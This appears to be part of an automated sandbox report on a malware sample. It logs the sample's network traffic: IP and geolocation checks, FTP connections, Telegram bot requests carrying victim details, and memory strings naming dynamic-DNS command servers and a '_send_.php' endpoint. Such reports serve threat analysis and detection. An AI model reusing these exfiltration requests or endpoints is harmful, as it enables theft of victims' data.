                    Source: unknownFTP traffic detected: 45.143.99.52:21 -> 192.168.2.4:49778 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: quicklyserv.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 30 Sep 2024 13:03:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 30 Sep 2024 13:03:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000319E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000338F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://quicklyserv.com
                    Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1802993888.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a
                    Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004292000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
